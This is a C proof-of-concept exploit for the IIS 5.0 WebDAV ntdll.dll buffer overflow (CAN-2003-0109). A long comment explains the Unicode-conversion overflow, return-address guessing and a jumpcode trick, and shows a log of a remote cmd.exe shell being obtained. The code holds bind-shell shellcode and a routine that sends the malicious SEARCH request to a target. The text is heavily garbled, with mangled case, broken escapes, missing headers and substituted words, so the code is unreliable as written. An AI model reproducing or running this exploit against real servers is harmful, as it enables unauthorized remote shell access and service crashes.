/ ************************************ /
/ * IIS 5.0 WebDav -Proof of Concept- * /
/ * [Bug: CAN-2003-0109] * /
/ * By Roman Medina-Heigl Hernandez * /
/ * aka romansoft
/ * Madrid, 23.mar.2003 * /
/ * ===================================================================================================================================== * /
/ * Public release. Version 1. * /
/ * --------------------------------- * /
/ ************************************ /
/ * ================================================================================================================================================================ ====================
* - [read me]
*
* This Exploit is Mainly a proof of concept of the recently discovered ntdll.dll bug (Which May BE
* Exploited In Many Other Programs, Not Necessarily IIS. Practical Exploitation is not as easy as
* Expected Due to Difficult Ret Guessing Mixed with Possible IIS CRASHES (Which Makes Ret Brute
* forcing a tedious work. The shellcode include here Will Bind A cmd.exe shell to a given port
* At The Victim Machine SO It Could Be Problematic if That Machine Is Protected Behind A FireWall.
* For all these Reasons, The Scope of this code is limited and mainly intended for educational
.
*
* The Program Sends a http request like this:
*
* Search / [NOP] [RET] [RET] [RET] ... [RET] [NOP] [NOP] [NOP] [NOP] [NOP] ... [NOP] [jmpcode] http / 1.1
* {Http headers here}
* {HTTP Body with Webdav Content} * 0x01 [shellcode]
*
* IIS Converts The First Ascii String ([NOP] ... [jmpcode]) to Unicode UTF-16 ENCODING
* Instance, 0x41 becomes 0x41 0x00, i.e. an extra 0x00 byte is address) and it is the resultant
* Unicode string the one producing the overflow. So at first glance, we cannot Include Code Here
* (More On this Later) Because It Would Get Corrupted by 0x00 (AND Other) Inserted bytes. Not AT
* Least Using The Common Method. Another Problem That We Will Have To Live With Is Our Ret Value
* Being Padded with null bytes, so if we use 0xabcd in our string, The Real Ret Value (I.E. THE
* One Eip Will Be Overwritten with) Would Be 0x00ab00cd. This is an important rest.
*
* WE HAVE TWO Alternative:
*
* 1) The Easy ONE: FIND ANY OCCURRENCES OF Our Ascii String (I.E.Before It gets Converted To
* The unicode form) in process memory. Problem: NORMALLY We Should Find IT by debugging the
* Vulnerable Application and The Hardcode The Found Address (Which Will Be The Ret Address)
* IN Our Exploit Code. This Ret Address Is Variable, Even for the Same Version of OS And App
* (I mean Different Instances of the Same Application In The Same Machine Could Make The Same Machine COULD MAKE THE
* Guessed Ret Address Invalid At Different Moments). Now Add The Restriction of Ret Value
* Padded with null-bytes. Anyway, the main advantage of this method is this we will not have
* to DEAL with 0x00-Padded shellcode.
*
* 2) The Not So-Easy One: You Could Insert An Encode Shellcode in Such A Way That When THE APP
* Expands the ascii string (with the encoded shellcode) To Unicode, a Valid shellcode is
* Automagically Placed Into Memory. please, Refer to Chris Anley's "VENETIN EXPLOIT" Paper
* to read more about this. Dave Aitel Also Has A Good Paper About this Technique and Indeed
* He Released Code Written in Python To Encode Shellcode (I'm Wondering If He Will Release A
* Working Tool for That Purpose, Since The Actual Code Was Released As Part of A Commercial
* Product, So it cannot Be Run without Buying The Whole Product, Despite the Module Itself
* Being free!). Problem: it is not so easy as the first method ;-) Advantage: When a over-
* Flow Happens, Some Registers May Point To Our Unicoded String (Where Our Unicoded-shellcode
* Lives in), SO We don't need to guess the address where shellcode will be placed and the
* Cance of a successful expect. for instance, in this case, when
* IIS Is overflowed, ECX Register Points to the Unicode String. The idea is the fli in
* RET Value with The Fixed Address of Code Like "Call% ECX". This Code May Be Contained in
* Any Previosly-loaded library, for example).
*
* Well, Guess it ... Yes ... i chose the easy method :-) Perhaps i will shutrite the expedition
* USING METHOD 2, But I cannot promise.
*
* Let's See Another Problem of the Method 1 (Which I Have Used). NOT All Unicode Conversions
* Result in a 0x00 Byte Being Added. this is true for ASCII Characters Lower OR Equal To 0x7f
* (Except for Some Few Special Characters, I'm Not Sure). But Our shellcode will Have Bytes
* Greater Than 0x7f value. so we don't know the exact length of the uncoded-string containing
* Our shellcode (Some ASCII Chars Will Expand to more Than 2 Bytes, I think). As a result,
* Sometimees the expedition May Not Work, Because No Exact length is matched. for instance, if you
* Carry Out Experiments On this Issue, you could See That Iis Crash (overflow occupurs) WHEN * Entering a query search /AAAA... AAA HTTP / 1.1, WITH 65535 a 's. Same Happens with 65536.
* But with diffrest values seems not to work. So matching the exact length is important here!
*
* What I have done, it is to include a little "jumpcode" instead of the shellcode itself. The shellcode itself..
* Jumpcode is placed Into the "critical" Place and Has A Fixed Length, So Our String Has Always
* a Fixed Length, Too. The "Variable" part (the shellcode) is placed at the end of the http
* Request (so you can insert your owlcode and remove the one I'm using here, with no apparent
* Problem). To be precise, The End of The Request Will be: 0x01 [shellcode]. The 0x01 byte Marks
* The beginning of the shellcode and it is buy by the jumpcode to find the address where shell-
* Code Begins and Jump Into It. It is not possible to Hardcode a Relative Jump, Because HTTP
* Headers Have a variable length (Think About the "Host:" Header and You Will Understand What
* I'm Saying). Well, Really, The Exploit Could Have Calculated The Relative Jump Itself (Other
* Problems arise like null-bytes Possibly contained in the offset field) But i since
* Use the 0x01 trick. it's my expedition, it's my choice :-)
*
* After launching the expedition, Several Things May Happen:
* - The expect to the bound port of victim machine and get a ban
* shell. Great. Remember what when Issue An "exit" Command in the shell prompt, the pro-
* CESS WILL BE TERMINATED. THIS IMPLIES THAT IIS Could Die.
* - EXPLOIT RETURNS A "Server Not Vulnerable" response. real, the server may not be vulnerable * or perhaps the search method used by the experament is not permitted (The Bug Can Still B
* Exploited via get, probably) or WebDAV IS Disabled At ALL.
* - EXPLOIT DID NOT GET SUCCESS (Which Is Not Strange, Since It Is Not easy to Guess Ret Value)
* But The Server IS Vulnerable. IIS Will Probably Not Survive: a "Net Start W3SVC" Could BE
* Needed in The Victim Machine, in Order To Restart The WWW Service.
*
* The Following Log Shows A Correct Exploitation:
*
* Roman @ Goliat: ~ / IIS5Webdav> gcc -o rs_iis rs_iis.c
* Roman @ goliat: ~ / Iis5webdav> ./rs_iis roman
* [*] Resolving hostname ...
* [*] Attacking port 80 at roman (EIP = 0x00480004) ...
* [*] Now open another console / shell and try to connect (telnet) to Victim Port 31337 ...
*
* Roman @ Goliat: ~ / IIS5Webdav> Telnet Roman 31337
* Trying 192.168.0.247 ...
* Connected to Roman.
* Escape Character is '^]'.
* Microsoft Windows 2000 [VERSI 5.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
*
* C: / WinNT / System32>
*
*
* I am not going to show logs for the faulty casse. I'm pretty Sure You Will See Them Very
* Soon :-) But Yes, The Exploit Works, Perhaps a little fine-tunning may be required, though.
* So Please, do not contact me telling what the expend doesn't work or thing thing. IT
* Worked for me and it will work for you, if you're not a script-kiddie. Try to attach to the
* IIS Process (inetinfo.exe) with the help of a debugger (ollydbg is my favour) on the
* Victim Machine and the launch the expel against it. Debugger Will Break When THE FIRST
* EXCEPTION IS Product in 0x00ab00cd (Being 0xAbcd The Not-Unicoded * Ret Value) And Resume Execution Until You Reach That Point. Finally, It's Time To Search
* The Memory Looking for Our Shellcode. It is nerly impossible (Very Low Chance) That Our
* shellcode is found at any 0x00 ** 00 ** - form address (Needed to bypass the Ret Restriction
* Imposed by Unicode Conversion) But no problem: you have a lot of nops before the shellcode
* Where you could point to. if Eip is overwritten with the address of selfh a nop, Program Flow
* Will Finish Reaching Our Shellcode. Note Also That Among The Two Bytes of Ret That We Have Some
* Kind of Control, The More Important Is The First ONE, I. The More Significant. in Other
* Words, Interesting Ret Values to Try Are: 0x0104, 0x0204, 0x0304, 0x0404, 0x0504, ...,
* And so on, till 0xff04. as you may have noticed, the last byte (0x04) Is Never Changed Because
* ITS Weight Is Minimal (256 Between Aprox. 65000 NOP's IS Not Appreciable).
*
*
* My BEST WISHES,
* --Roman
*
* ===================================== - [Eot] - ===== ================
* /
#include
#include
#include
#include
#include
#include
#include
#include
// Change to fit your need
#define ret 0x4804 // EIP = 0x00480004
#define loadinglibrarya 0x0100107c
#define getProcaddress 0x01001034
// Don't change this # define port_offset 1052
#define loadingl_offset 798
#define getProc_offset 815
#define nop 0x90
#define maxbuf 100000
/ *
* LoadLibrarya It Address: = 0100107C
* GetProcaddress it pess: = 01001034
* /
Unsigned char shellcode [] = // Deepzone shellcode
"/ x68 / x5e / x54 / x59 / xff / xd1 / x58 / x33 / xc9 / xb1 / x1c"
"/ x90 / x03 / x90 / x90 / x03 / xf1 / x56 / x5f / x33 / xc9 / x66 / xb9 / x95 / x04"
"/ X90 / x90 / x99 / xaa / x34 / xfa / x71 / x99 / x99 / x99 / x99"
"/ XC4 / X18 / X74 / X40 / XB8 / XD9 / X99 / X14 / X2C / X6B / XBD / XD9 / X99 / X14"
"/ x24 / x63 / xbd / xd9 / x99 / x09 / x09 / x09 / xc0 / x71 / x4b"
"/ X9B / X99 / X99 / X14 / X2C / XB3 / XBC / XD9 / X99 / X14 / X24 / XAA / XBC / XD9"
"/ x99 / x09 / x09 / x09 / xc0 / x71 / x23 / x9b / x99 / x99 / xf3"
"/ X99 / X14 / X2C / X40 / XBC / XD9 / X99 / XCF / X14 / X2C / X7C / XBC / XD9 / X99"
"/ XCF / X14 / X2C / X70 / XBC / XD9 / X99 / XCF / X66 / X0C / XAA / XBC / XD9 / X99"
"/ XF3 / X99 / X14 / X2C / X40 / XBC / XD9 / X99 / XCF / X14 / X2C / X74 / XBC / XD9"
"/ X99 / XCF / X14 / X2C / X68 / XBC / XD9 / X99 / XCF / X66 / X0C / XAA / XBC / XD9"
"/ x99 / x5e / x1c / x6c / xbc / xd9 / x99 / xdd / x99 / x99 / x99 / x14 / x2c / x6c"
"/ XBC / XD9 / X99 / XCF / X66 / X0C / XAE / XBC / XD9 / X99 / X14 / X2C / XB4 / XBF"
"/ XD9 / X99 / X34 / XC9 / X66 / X0C / XCA / XBC / XD9 / X99 / X14 / X2C / XA8 / XBF"
"/ XD9 / X99 / X34 / XC9 / X66 / X0C / XCA / XBC / XD9 / X99 / X14 / X2C / X68 / XBC"
"/ xd9 / x99 / x14 / x24 / xb4 / xbf / xd9 / x99 / x3c / x14 / x2c / x7c / xbc / xd9"
"/ x99 / x34 / x14 / x24 / xa8 / xbf / xd9 / x99 / x32 / x14 / x24 / xac / xbf / xd9"
"/ x99 / x32 / x5e / x1c / xbc / x99 / x99 / x99 / x99 / x5e / x1c"
"/ XB8 / XBF / XD9 / X99 / X98 / X98 / X99 / X99 / X14 / X2C / XA0 / XBF / XD9 / X99"
"/ XCF / X14 / X2C / X6C / XBC / XD9 / X99 / XCF / XF3 / X99 / XF3 / X99 / XF3 / X89"
"/ XF3 / X98 / X99 / X14 / X2C / XD0 / XBF / XD9 / X99 / XCF / XF3"
"/ x99 / x66 / xd9 / x99 / x99 / x99 / x09 / x99 / x99 / x09 / xf1" "/ x99 / x9b / x99 / x99 / x66 / x0c / xda / Xbc / xd9 / X99 / X10 / X1C / XC8 / XBF "
"/ xd9 / x99 / xaa / x59 / xc9 / xd9 / xc9 / xd9 / xc9 / x66 / x0c / x63 / xbd / xd9"
"/ X99 / XC9 / XC2 / XF3 / X89 / X14 / X2C / X50 / XBC / XD9 / X99 / XCF / XCA / X66"
"/ X0C / X67 / XBD / XD9 / X99 / XF3 / X9A / XCA / X66 / X0C / X9B / XBC / XD9 / X99"
"/ X14 / X2C / XCC / XBF / XD9 / X99 / XCF / X14 / X2C / X50 / XBC / XD9 / X99 / XCF"
"/ xca / x66 / xd9 / x99 / x14 / x24 / xc0 / xbf / xd9 / x99 / x32"
"/ XAA / X59 / XC9 / X14 / X24 / XFC / XBF / XD9 / X99 / XCE / XC9 / XC9 / XC9 / X14"
"/ X2C / X70 / XBC / XD9 / X99 / X04 / XC9 / X66 / X0C / XA6 / XBC / XD9 / X99 / XF3"
"/ xa9 / x66 / x0c / xd6 / xbc / xd9 / x09 / x09 / x09 / xaa / x59"
"/ XC9 / X14 / X24 / XFC / XBF / XD9 / X99 / XCE / XC9 / XC9 / XC9 / X14 / X2C / X70"
"/ xbc / xd9 / x99 / x34 / xc9 / x66 / x0c / xa6 / xbc / xd9 / x99 / xf3 / xc9 / x66"
"/ X0C / XD6 / XBC / XD9 / X99 / X1A / X24 / XFC / XBF / XD9 / X99 / X9B / X96 / X1B"
"/ x8e / x98 / x99 / x99 / x18 / x24 / xfc / xbf / xd9 / x99 / x98 / xb9 / x99 / x99"
"/ XEB / X09 / X09 / X09 / X09 / X09 / X5E / X1C / XFC / XBF / XD9 / X99 / X99 / XB9"
"/ X99 / X99 / XF3 / X99 / X12 / X1C / XFC / XBF / XD9 / X99 / X14 / X24 / XFC / XBF"
"/ XD9 / X99 / XCE / XC9 / X12 / X1C / XC8 / XBF / XD9 / X99 / XC9 / X14 / X2C / X70"
"/ xbc / xd9 / x99 / x34 / xc9 / x66 / x0c / xde / xbc / xd9 / x99 / xf3 / xc9 / x66"
"/ X0C / XD6 / XBC / XD9 / X99 / X12 / X1C / XFC / XBF / XD9 / X99 / XF3 / X99 / XC9"
"/ X14 / X2C / XC8 / XBF / XD9 / X99 / X34 / XC9 / X14 / X2C / XC0 / XBF / XD9 / X99"
"/ x34 / xc9 / x66 / x0c / x93 / xbc / xd9 / x99 / xf3 / x99 / x14 / x24 / xfc / xbf"
"/ XD9 / X99 / XCE / XD9 / X99 / XF3 / X99 / XF3 / X99 / X14 / X2C / X70 / XBC / XD9"
"/ x99 / x34 / xc9 / x66 / x0c / xa6 / xbc / xd9 / x99 / xf3 / xc9 / x66 / x0c / xd6"
"/ XBC / XD9 / X99 / XAA / X50 / XA0 / X14 / XFC / XBF / XD9 / X99 / X96 / X1E / XFE"
"/ x66 / x99 / x66 / x99 / xb9 / x99 / x99 / x09 / x14 / x2c / xc8"
"/ XBF / XD9 / X99 / X34 / XC9 / X14 / X2C / XC0 / XBF / XD9 / X99 / X34 / XC9 / X66" "" / X0C / X97 / XBC / XD9 / X99 / X10 / X1C / XF8 / XBF / XD9 / X99 / XF3 / X99 / X14 "
"/ X24 / XFC / XCE / XD9 / X99 / XCE / XC9 / X14 / X2C / XC8 / XBF / XD9 / X99 / X34"
"/ XC9 / X14 / X2C / X74 / XBC / XD9 / X99 / X34 / XC9 / X66 / X0C / XD2 / XBC / XD9"
"/ x99 / xf3 / xc9 / x66 / x0c / xd6 / xbc / xd9 / x99 / xf3 / x99 / x12 / x1c / xf8"
"/ XBF / XD9 / X99 / X14 / X24 / XFC / XBF / XD9 / X99 / XCE / XC9 / X12 / X1C / XC8"
"/ XBF / XD9 / X99 / XC9 / X14 / X2C / X70 / XBC / XD9 / X99 / X34 / XC9 / X66 / X0C"
"/ XDE / XBC / XD9 / X99 / XF3 / XC9 / X66 / X0C / XD6 / XBC / XD9 / X99 / X70 / X20"
"/ x67 / x66 / xc0 / xbf / xd9 / x99 / x34 / xc9 / x66 / x0c / x8b"
"/ XBC / XD9 / X99 / X14 / X2C / XC4 / XBF / XD9 / X99 / X34 / XC9 / X66 / X0C / X8B"
"/ XBC / XD9 / X99 / X0 / X99 / X66 / X0C / XCE / XBC / XD9 / X99 / XC8 / XCF / XF1"
"/ XE5 / X09 / XC3 / X66 / X8B / XC9 / XC2 / XC0 / XCE / XC7 / XC8"
"/ xcf / xca / xf1 / xad / x89 / x99 / x98 / x09 / xc3 / x66 / x8b / xc9 / x35 / x1d"
"/ X59 / XEC / X62 / XC1 / X32 / XC0 / X7B / X70 / X5A / XCE / XCA / XD6 / XDA / XD2"
"/ XAA / XAB / X99 / XEA / XF6 / XFA / XF2 / XFC / XED / X99 / XFB / XF0 / XF7 / XFD"
"/ X99 / XF5 / XF0 / XEA / XED / XFC / XF7 / X99 / XF8 / XFA / XFA / XFC / XE9 / XED"
"/ X99 / XEA / XFC / XF7 / XFD / X99 / XEB / XFC / XFA / XEF / X99 / XFA / XF5 / XF6"
"/ XEA / XFC / XEA / XF6 / XFA / XF2 / XFC / XED / X99 / XD2 / XDC / XCB / XD7 / XDC"
"/ xd5 / xaa / xab / x99 / xda / Xeb / XFC / XF8 / XED / XFC / XC9 / XF0 / XE9 / XFC"
"/ X99 / XDE / XFC / XED / XCA / XED / XF8 / XEB / XED / XEC / XE9 / XD0 / XF7 / XFF"
"/ xf6 / xd8 / x99 / xda / Xeb / XFC / XEB / XED / XFC / XC9 / XEB / XF6 / XFA / XFC"
"/ XEA / XEA / XD8 / X99 / XC9 / XFC / XFC / XF2 / XD7 / XF8 / XF4 / XFC / XFD / XC9"
"/ XF0 / XE9 / XFC / X99 / XDE / XF5 / XF6 / XFB / XF8 / XF5 / XD8 / XF5 / XF5 / XF6"
"/ XFA / X99 / XCB / XFC / XF8 / XFD / XDF / XF0 / XF5 / XFC / X99 / XCE / XEB / XF0"
"/ XED / XFC / XDF / XF0 / XF5 / XFC / X99 / XCA / XF5 / XFC / XFC / XE9 / X99 / XDA"
"/ XF5 / XD1 / XEA / XFC / XD1 / XF8 / XF7 / XFD / XF5 / XE1 / XF0" "/ XED / XC9 / XEB / XEA / X99 / XEA / XEA / X99 / XDA / XF6 / XFD / XFC / XFD "
"/ XB9 / XFB / XE0 / XB9 / XE5 / XC3 / XF8 / XF7 / XB9 / XA5 / XF0 / XE3 / XF8 / XF7"
"/ XD9 / XFD / XFC / XFC / XE9 / XE3 / XF6 / XF7 / XFC / XB7 / XF6 / XEB / XFE / XA7"
"/ x9b / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99"
"/ x99 / x99 / x99 / x99 / x99 / x99 / x99 / x98 / x99 / x99 / x99"
"/ x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99"
"/ x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99"
"/ x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99"
"/ x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99"
"/ x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99"
"/ x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99"
"/ x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99"
"/ x99 / x99 / xda / xd4 / xdd / xb7 / xdc / xc1 / xdc / x99 / x99 / x99 / x99 / x99"
"/ x89 / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99 / x99"
"/ x99 / x99 / x99 / x99 / x99 / x90 / x90 / x90 / x90 / x90 / x90"
Unsigned char jumpcode [] = "/ x8b / xf9 / x32 / xc0 / xfe / xc0 / xf2 / xae / xff / xe7";
/ * MOV EDI, ECX
* xor al, al
* incap
* RepNZ scaSB
* JMP EDI
* /
Char body [] = " / r / n
/ * Our Code Starts Here * /
INT main (int Argc, char ** argv)
{
Unsigned long Ret;
UNSIGNED SHORT Port;
INT TPORT, BPORT, S, I, J, R, RT = 0;
Struct hostent * h;
Struct sockaddr_in dst;
Char buffer [maxbuf];
IF (Argc <2 || Argc> 5)
{
Printf ("IIS 5.0 WebDav Exploit by Romansoft
EXIT (-1);
}
// Default Target port = 80
IF (Argc> 2)
TPORT = ATOI (Argv [2]);
Else
TPORT = 80;
// default bind port = 31337
IF (argc> 3)
BPort = ATOI (Argv [3]);
Else
BPORT = 31337;
// default return value = RET
IF (Argc> 4)
RET = Strtoul (Argv [4], NULL, 16);
Else
RET = RET;
IF (RET> 0xfffff || (RET & 0xFF) == 0 || (RET & 0xFF00) == 0)
{
fprintf (stderr, "RET value must be in 0x0000-0xffff range and it may not contain null-bytes / nAborted / n!");
EXIT (-2);
}
// shellcode patching
Port = HTONS (BPORT);
Port ^ = 0x9999;
IF ((Port & 0xFF) == 0) || ((Port & 0xFF00) == 0))
{
FPRINTF (stderr, "binding-port contacts null-byte. used"); NNABORTED !N
EXIT (-3);
}
* (unsigned short *) & shellcode [port_offset] = port;
* (unsigned long *) & shellcode [loadingl_offset] = loadingLibrarya ^ 0x99999999;
* (unsigned long *) & shellcode [getProc_offset] = getProcaddress ^ 0x99999999;
// if the last two items contain any null-bytes, Exploit Will Fail.
// Warning: this check is not performed here. Be careful and check it for yourself!
// resolve hostname
Printf ("[*] resolving hostname ... / n");
IF ((h = gethostbyname) == NULL)
{
FPRINTF (stderr, "% s: unknown hostname / n", argv [1]);
exit (-4);
}
Bcopy (h-> h_addr, & dst.sin_addr, h-> h_length);
Dst.sin_family = AF_INET;
Dst.sin_port = htons (tport); // Socket Creation
IF ((S = Socket (AF_INET, SOCK_STREAM, 0) == -1)
{
"Failed to Create Socket";
exit (-5);
}
// connection
IF (Connect (S, Struct SockAddr *) & DST, SIZEOF (DST)) == -1)
{
Perror ("Failed to Connect");
EXIT (-6);
}
// build mALICIS STRING ...
Printf ("[*] attacking port% i at% s (EIP =% #. 4x% .4x) ... / n", tport, argv [1], ((RET >> 8) & 0xFF), RET & 0xFF);
Bzero (Buffer, Maxbuf);
STRCPY (Buffer, "Search /");
i = strlen (buffer);
Buffer [I] = NOP; // Align for Ret overwrite
// Normally, Eip Will Be Overwritten with buffer [8 2087] But i prefer to fill some more bytes ;-)
For (j = i 1; j
* (unsigned short *) & buffer [j] = (unsigned short) ret;
// the rest is padded with nop's. RET Address SHOULD POINT TOTHIS ZONE!
For (; J
BUFFER [J] = NOP;
// THEN We Skip The Body of the Http Request
Memcpy (& Buffer [J], Jumpcode, Strlen (Jumpcode);
STRCPY (Buffer Strlen (buffer), "http / 1.1 / r / n");
Sprintf (Buffer Strlen (Buffer), "Host:% S / R / NCONTENT-TYPE: TEXT / XML / R / NCONTENT-LENGTH:% D / R / N / R / N", Argv [1], STRLEN Body) Strlen (shellcode));
STRCPY (Buffer Strlen (Buffer), Body;
// this byte is buy to mark the beginning of the shellcode
MEMSET (Buffer Strlen (Buffer), 0x01, 1);
// and finally, we land insto our shellcode
MEMSET (Buffer Strlen (Buffer), NOP, 3);
STRCPY (Buffer Strlen (buffer), shellcode;
// send request
IF (SEND (S, Buffer, Strlen (Buffer), 0)! = Strlen (buffer))
{
"Failed to send");
EXIT (-7);
}
Printf ("[*] now open annother console / shell and try to connect (telnet) to Victim Port% i ... / n", bPort); // receive response
While ((R = Recv (s, & buffer [rt], maxbuf-1, 0))> 0)
RT = R;
// this code is not bullet-proof. An Evil WWW Server Could Return A Response Bigger Than Maxbuf
// and an overflow wouldue occur here yes, i'm lazy ... :-)
Buffer [rt] = '/ 0';
IF (RT> 0)
Printf ("[*] Victim Server Issued The Following% D Bytes of Response: / N - / N% S / N - / N [*] Server Not VulneRable! / n", RT, Buffer;
Else
Printf ("[*] Server is Vulnerable Butt Value (E.G. 0xCE04) and try Again (When IIS Up Again): - // n", bPort);
Close (s);
}
